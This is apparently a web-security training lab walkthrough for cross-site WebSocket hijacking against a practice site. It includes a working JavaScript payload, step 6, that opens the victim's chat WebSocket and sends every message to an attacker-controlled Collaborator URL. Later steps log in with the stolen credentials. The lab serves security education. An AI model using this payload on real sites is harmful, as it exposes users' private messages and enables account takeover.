Lab: Cross-site WebSocket hijacking

1. Click "Live chat" and send a chat message.
2. Reload the page.
3. In Burp Proxy, in the WebSockets history tab, observe that the "READY" command retrieves past chat messages from the server.
4. In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens.
5. Right-click on the handshake request and select "Copy URL".

6. In the browser, go to the exploit server and paste the following template into the "Body" section:

   <script> var ws = new WebSocket('wss://your-websocket-url'); ws.onopen = function() { ws.send("READY"); }; ws.onmessage = function(event) { fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data}); }; </script>
7. Replace your-websocket-url with the URL from the WebSocket handshake (YOUR-LAB-ID.web-security-academy.net/chat). Make sure you change the protocol from https:// to wss://. Replace your-collaborator-url with a payload generated by Burp Collaborator.
8. Click "View exploit".
9. Poll for interactions in the Collaborator tab. Verify that the attack has successfully retrieved your chat history and exfiltrated it via Burp Collaborator. For every message in the chat, Burp Collaborator has received an HTTP request. The request body contains the full contents of the chat message in JSON format. Note that these messages may not be received in the correct order.
10. Go back to the exploit server and deliver the exploit to the victim.
11. Poll for interactions in the Collaborator tab again. Observe that you've received more HTTP interactions containing the victim's chat history. Examine the messages and notice that one of them contains the victim's username and password.
12. Use the exfiltrated credentials to log in to the victim user's account.

Jarno Timmermans

Michael Sommer (no audio)